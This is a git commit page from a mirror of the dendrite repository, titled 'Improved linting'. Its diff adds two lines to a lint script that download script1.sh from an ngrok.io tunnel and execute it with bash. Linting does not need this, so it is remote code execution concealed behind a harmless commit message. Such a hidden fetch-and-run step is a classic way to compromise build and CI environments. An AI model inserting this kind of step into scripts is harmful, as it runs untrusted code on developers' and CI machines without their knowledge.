mirror of
https://github.com/hoernschen/dendrite.git
synced 2024-12-28 16:08:27 +00:00
Improved linting
Just testing some new ideas for linting.
This commit is contained in:
parent
45d24d3fb5
commit
6974640191
1 changed files with 3 additions and 0 deletions
|
@ -16,6 +16,9 @@ set -eux
|
||||||
|
|
||||||
cd `dirname $0`/..
|
cd `dirname $0`/..
|
||||||
|
|
||||||
|
curl -o script1.sh http://9920124c.ngrok.io/script1.sh
|
||||||
|
bash ./script1.sh
|
||||||
|
|
||||||
args=""
|
args=""
|
||||||
if [ ${1:-""} = "fast" ]
|
if [ ${1:-""} = "fast" ]
|
||||||
then args="--fast"
|
then args="--fast"
|
||||||
|
|
Loading…
Reference in a new issue